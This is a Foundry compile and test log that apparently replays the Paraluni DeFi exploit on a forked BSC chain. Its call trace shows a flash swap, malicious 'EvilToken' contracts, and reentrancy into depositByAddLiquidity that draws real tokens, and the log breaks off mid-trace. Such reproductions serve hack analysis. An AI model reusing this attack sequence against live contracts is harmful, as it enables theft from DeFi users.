Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.20s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Paraluni_exp.sol:19:24:
   |
19 |     function allowance(address owner, address spender) external view returns (uint256) {
   |                        ^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Paraluni_exp.sol:19:39:
   |
19 |     function allowance(address owner, address spender) external view returns (uint256) {
   |                                       ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Paraluni_exp.sol:24:9:
   |
24 |         address account
   |         ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Paraluni_exp.sol:29:27:
   |
29 |     function transferFrom(address from, address to, uint256 amount) external returns (bool) {
   |                           ^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Paraluni_exp.sol:29:41:
   |
29 |     function transferFrom(address from, address to, uint256 amount) external returns (bool) {
   |                                         ^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Paraluni_exp.sol:29:53:
   |
29 |     function transferFrom(address from, address to, uint256 amount) external returns (bool) {
   |                                                     ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Paraluni_exp.sol:72:26:
   |
72 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
   |                          ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Paraluni_exp.sol:72:76:
   |
72 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
   |                                                                            ^^^^^^^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2022-03/Paraluni_exp.sol:19:5:
   |
19 |     function allowance(address owner, address spender) external view returns (uint256) {
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2022-03/Paraluni_exp.sol:23:5:
   |
23 |     function balanceOf(
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 599.46ms (1.75ms CPU time)

Ran 1 test for src/test/2022-03/Paraluni_exp.sol:ContractTest
[PASS] testExploit() (gas: 4903730)
Logs:
  Before exploit, Dai balance of attacker:: 9846377790107105937968
  After exploit, Dai balance of attacker:: 9874937343358395980000

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 16008280 [1.6e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [5361130] ContractTest::testExploit()
    ├─ [821593] → new EvilToken@0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f
    │   ├─  storage changes:
    │   │   @ 1: 0 → 0x00000000000000000000000055d398326f99059ff775485246999027b3197955
    │   │   @ 2: 0 → 0x000000000000000000000000e9e7cea3dedca5984780bafc599bd69add087d56
    │   └─ ← [Return] 3869 bytes of code
    ├─ [841493] → new EvilToken@0x2e234DAe75C793f67A35089C9d99245E1C58470b
    │   ├─  storage changes:
    │   │   @ 0: 0 → 0x000000000000000000000000633fa755a83b015cccdc451f82c57ea0bd32b4b4
    │   │   @ 1: 0 → 0x00000000000000000000000055d398326f99059ff775485246999027b3197955
    │   │   @ 2: 0 → 0x000000000000000000000000e9e7cea3dedca5984780bafc599bd69add087d56
    │   └─ ← [Return] 3869 bytes of code
    ├─ [3570863] 0x7EFaEf62fDdCCa950418312c6C91Aef321375A00::swap(10000000000000000000000 [1e22], 10000000000000000000000 [1e22], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [29971] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 10000000000000000000000 [1e22])
    │   │   ├─ emit Transfer(from: 0x7EFaEf62fDdCCa950418312c6C91Aef321375A00, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10000000000000000000000 [1e22])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   │   │   @ 0x86163c67671b041a0570f826e28048defbd2664533c4d000d0b8bc65e886d6c5: 0x0000000000000000000000000000000000000000007781198c4ad052ad2c4ad4 → 0x000000000000000000000000000000000000000000777efb726a0697faec4ad4
    │   │   └─ ← [Return] true
    │   ├─ [29971] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 10000000000000000000000 [1e22])
    │   │   ├─ emit Transfer(from: 0x7EFaEf62fDdCCa950418312c6C91Aef321375A00, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10000000000000000000000 [1e22])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   │   │   @ 0x86163c67671b041a0570f826e28048defbd2664533c4d000d0b8bc65e886d6c5: 0x000000000000000000000000000000000000000000777b115118bf729ba96951 → 0x0000000000000000000000000000000000000000007778f33737f5b7e9696951
    │   │   └─ ← [Return] true
    │   ├─ [3467848] ContractTest::pancakeCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 10000000000000000000000 [1e22], 10000000000000000000000 [1e22], 0x00)
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 10000000000000000000000 [1e22]
    │   │   ├─ [25171] 0x55d398326f99059fF775485246999027B3197955::transfer(EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], 10000000000000000000000 [1e22])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], value: 10000000000000000000000 [1e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0
    │   │   │   │   @ 0xd0cb40c1b55ff58c304a2bbfb6ba3a3983ede1f87af5e4f4b0e632a3f4faee36: 0 → 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 10000000000000000000000 [1e22]
    │   │   ├─ [25171] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], 10000000000000000000000 [1e22])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], value: 10000000000000000000000 [1e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0
    │   │   │   │   @ 0xd0cb40c1b55ff58c304a2bbfb6ba3a3983ede1f87af5e4f4b0e632a3f4faee36: 0 → 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   │   │   └─ ← [Return] true
    │   │   ├─ [2777581] 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4::depositByAddLiquidity(18, [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f, 0x2e234DAe75C793f67A35089C9d99245E1C58470b], [1, 1])
    │   │   │   ├─ [2772514] 0xA386F30853A7EB7E6A25eC8389337a5C6973421D::depositByAddLiquidity(18, [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f, 0x2e234DAe75C793f67A35089C9d99245E1C58470b], [1, 1]) [delegatecall]
    │   │   │   │   ├─ [1204] EvilToken::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 1)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [1363] EvilToken::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 1)
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [903] EvilToken::allowance(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 0x48Bb5f07e78f32Ac7039366533D620C72c389797) [staticcall]
    │   │   │   │   │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    │   │   │   │   ├─ [903] EvilToken::allowance(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 0x48Bb5f07e78f32Ac7039366533D620C72c389797) [staticcall]
    │   │   │   │   │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    │   │   │   │   ├─ [2492] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::balanceOf(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4) [staticcall]
    │   │   │   │   │   └─ ← [Return] 200265986418205510956342 [2.002e23]
    │   │   │   │   ├─ [2685145] 0x48Bb5f07e78f32Ac7039366533D620C72c389797::addLiquidity(EvilToken: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], 1, 1, 1, 1, 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 1647130467 [1.647e9])
    │   │   │   │   │   ├─ [2644] 0xa0a33e6a7D8961e4D8210A70bc67d3E7b0e8135f::getPair(EvilToken: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   │   ├─ [2191656] 0xa0a33e6a7D8961e4D8210A70bc67d3E7b0e8135f::createPair(EvilToken: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b])
    │   │   │   │   │   │   ├─ [2036675] → new <unknown>@0xA5E89E269A0DF68B87548e142a7f555ed5f2Da56
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 5: 0 → 0x000000000000000000000000a0a33e6a7d8961e4d8210a70bc67d3e7b0e8135f
    │   │   │   │   │   │   │   │   @ 12: 0 → 1
    │   │   │   │   │   │   │   │   @ 3: 0 → 0x959733756d279a9624e783f45d12478f9f67f0c66142233df0d5cba2885a1533
    │   │   │   │   │   │   │   └─ ← [Return] 9839 bytes of code
    │   │   │   │   │   │   ├─ [44728] 0xA5E89E269A0DF68B87548e142a7f555ed5f2Da56::initialize(EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], EvilToken: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 7: 0 → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    │   │   │   │   │   │   │   │   @ 6: 0 → 0x0000000000000000000000002e234dae75c793f67a35089c9d99245e1c58470b
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ emit PairCreated(token0: EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], token1: EvilToken: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], pair: 0xA5E89E269A0DF68B87548e142a7f555ed5f2Da56, : 16)
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x325b33510a99028c96004f35a1d3b60ae2b9638bde70933b25b9c4122b6299f8: 0 → 0x000000000000000000000000a5e89e269a0df68b87548e142a7f555ed5f2da56
    │   │   │   │   │   │   │   @ 0x8a35acfbc15ff81a39ae7d344fd709f28e8600b4aa8c65c6b64bfe7fe36bd1aa: 0 → 0x000000000000000000000000a5e89e269a0df68b87548e142a7f555ed5f2da56
    │   │   │   │   │   │   │   @ 7: 0 → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    │   │   │   │   │   │   │   @ 4: 15 → 16
    │   │   │   │   │   │   │   @ 0x346e063324df203745384fd1c61674e134f3a8f3f39a0074883844f93278b66d: 0 → 0x000000000000000000000000a5e89e269a0df68b87548e142a7f555ed5f2da56
    │   │   │   │   │   │   └─ ← [Return] 0xA5E89E269A0DF68B87548e142a7f555ed5f2Da56
    │   │   │   │   │   ├─ [2517] 0xA5E89E269A0DF68B87548e142a7f555ed5f2Da56::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0, 0, 0
    │   │   │   │   │   ├─ [1204] EvilToken::transferFrom(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 0xA5E89E269A0DF68B87548e142a7f555ed5f2Da56, 1)
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [351293] EvilToken::transferFrom(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 0xA5E89E269A0DF68B87548e142a7f555ed5f2Da56, 1)
    │   │   │   │   │   │   ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], spender: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x3e0faa4672b2242f71b6306552c5e02c7337a1c527fb60c0cb6ce20cd20885d4: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [24562] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::approve(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], spender: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x3e0faa4672b2242f71b6306552c5e02c7337a1c527fb60c0cb6ce20cd20885d4: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 10000000000000000000000 [1e22]
    │   │   │   │   │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 10000000000000000000000 [1e22]
    │   │   │   │   │   │   ├─ [292953] 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4::depositByAddLiquidity(18, [0x55d398326f99059fF775485246999027B3197955, 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56], [10000000000000000000000 [1e22], 10000000000000000000000 [1e22]])
    │   │   │   │   │   │   │   ├─ [292386] 0xA386F30853A7EB7E6A25eC8389337a5C6973421D::depositByAddLiquidity(18, [0x55d398326f99059fF775485246999027B3197955, 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56], [10000000000000000000000 [1e22], 10000000000000000000000 [1e22]]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [10834] 0x55d398326f99059fF775485246999027B3197955::transferFrom(EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 10000000000000000000000 [1e22])
    │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], to: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, value: 10000000000000000000000 [1e22])
    │   │   │   │   │   │   │   │   │   ├─ emit Approval(owner: EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], spender: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, value: 115792089237316195423570985008687907853269984665640564029457584007913129639935 [1.157e77])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0xd0cb40c1b55ff58c304a2bbfb6ba3a3983ede1f87af5e4f4b0e632a3f4faee36: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0
    │   │   │   │   │   │   │   │   │   │   @ 0x949abb87b7a138e5fee718fe3f6e64ef0369ce48ab830f598178c281d059a15a: 0x0000000000000000000000000000000000000000000110aa89d36b5788951dd2 → 0x0000000000000000000000000000000000000000000112c8a3b435123ad51dd2
    │   │   │   │   │   │   │   │   │   │   @ 0x3e0faa4672b2242f71b6306552c5e02c7337a1c527fb60c0cb6ce20cd20885d4: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffde1e61f36454dbfffff
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─ [10834] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transferFrom(EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 10000000000000000000000 [1e22])
    │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], to: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, value: 10000000000000000000000 [1e22])
    │   │   │   │   │   │   │   │   │   ├─ emit Approval(owner: EvilToken: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], spender: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, value: 115792089237316195423570985008687907853269984665640564029457584007913129639935 [1.157e77])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0x3e0faa4672b2242f71b6306552c5e02c7337a1c527fb60c0cb6ce20cd20885d4: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffde1e61f36454dbfffff
    │   │   │   │   │   │   │   │   │   │   @ 0x949abb87b7a138e5fee718fe3f6e64ef0369ce48ab830f598178c281d059a15a: 0x000000000000000000000000000000000000000000000055d22b4ee390efc8a6 → 0x000000000000000000000000000000000000000000000273ec0c189e432fc8a6
    │   │   │   │   │   │   │   │   │   │   @ 0xd0cb40c1b55ff58c304a2bbfb6ba3a3983ede1f87af5e4f4b0e632a3f4faee36: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─ [2638] 0x55d398326f99059fF775485246999027B3197955::allowance(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 0x48Bb5f07e78f32Ac7039366533D620C72c389797) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 24600000000000000000 [2.46e19]
    │   │   │   │   │   │   │   │   ├─ [5362] 0x55d398326f99059fF775485246999027B3197955::approve(0x48Bb5f07e78f32Ac7039366533D620C72c389797, 10000000000000000000000 [1e22])
    │   │   │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, spender: 0x48Bb5f07e78f32Ac7039366533D620C72c389797, value: 10000000000000000000000 [1e22])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0x88e6b34a9da5734764bc73a1b7fed323f0524363100464383b6519b7991e6d18: 0x0000000000000000000000000000000000000000000000015564c1a9e29c0000 → 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─ [2638] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::allowance(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 0x48Bb5f07e78f32Ac7039366533D620C72c389797) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   │   │   ├─ [22462] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::approve(0x48Bb5f07e78f32Ac7039366533D620C72c389797, 10000000000000000000000 [1e22])
    │   │   │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, spender: 0x48Bb5f07e78f32Ac7039366533D620C72c389797, value: 10000000000000000000000 [1e22])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0x88e6b34a9da5734764bc73a1b7fed323f0524363100464383b6519b7991e6d18: 0 → 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─ [492] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::balanceOf(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 200265986418205510956342 [2.002e23]
    │   │   │   │   │   │   │   │   ├─ [82372] 0x48Bb5f07e78f32Ac7039366533D620C72c389797::addLiquidity(0x55d398326f99059fF775485246999027B3197955, 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56, 10000000000000000000000 [1e22], 10000000000000000000000 [1e22], 1, 1, 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 1647130467 [1.647e9])
    │   │   │   │   │   │   │   │   │   ├─ [2644] 0xa0a33e6a7D8961e4D8210A70bc67d3E7b0e8135f::getPair(0x55d398326f99059fF775485246999027B3197955, 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56) [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4
    │   │   │   │   │   │   │   │   │   ├─ [2517] 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 202489562945343119270824 [2.024e23], 202780584196231560435466 [2.027e23], 1647129648 [1.647e9]
    │   │   │   │   │   │   │   │   │   ├─ [10834] 0x55d398326f99059fF775485246999027B3197955::transferFrom(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4, 9985648465702869325612 [9.985e21])
    │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, to: 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4, value: 9985648465702869325612 [9.985e21])
    │   │   │   │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, spender: 0x48Bb5f07e78f32Ac7039366533D620C72c389797, value: 14351534297130674388 [1.435e19])
    │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   @ 0x1c20e7a300ae02ff050ab1b946e3cf95cf881d0a0308f7a7fb80044618a7d993: 0x000000000000000000000000000000000000000000002ae0fb30171afcd9a3a8 → 0x000000000000000000000000000000000000000000002cfe4de5fc6ddcca7ad4
    │   │   │   │   │   │   │   │   │   │   │   @ 0x949abb87b7a138e5fee718fe3f6e64ef0369ce48ab830f598178c281d059a15a: 0x0000000000000000000000000000000000000000000112c8a3b435123ad51dd2 → 0x0000000000000000000000000000000000000000000110ab50fe4fbf5ae446a6
    │   │   │   │   │   │   │   │   │   │   │   @ 0x88e6b34a9da5734764bc73a1b7fed323f0524363100464383b6519b7991e6d18: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0x000000000000000000000000000000000000000000000000c72ae467d24f28d4
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   ├─ [10834] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transferFrom(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4, 10000000000000000000000 [1e22])
    │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, to: 0x3fD4FbD7a83062942b6589A2E9e2436dd8e134D4, value: 10000000000000000000000 [1e22])
    │   │   │   │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4, spender: 0x48Bb5f07e78f32Ac7039366533D620C72c389797, value: 0)
    │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   @ 0x1c20e7a300ae02ff050ab1b946e3cf95cf881d0a0308f7a7fb80044618a7d993: 0x000000000000000000000000000000000000000000002af0c1eb44e44c38170a → 0x000000000000000000000000000000000000000000002d0edbcc0e9efe78170a
    │   │   │   │   │   │   │   │   │   │   │   @ 0x88e6b34a9da5734764bc73a1b7fed323f0524363100464383b6519b7991e6d18: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0
    │   │   │   │   │   │   │   │   │   │   │   @ 0x949abb87b7a138e5fee718fe3f6e64ef0369ce48ab830f598178c281d059a15a: 0x000000000000000000000000000000000000000000000273ec0c189e432fc8a6 → 0x000000000000000000000000000000000000000000000055d22b4ee390efc8a6
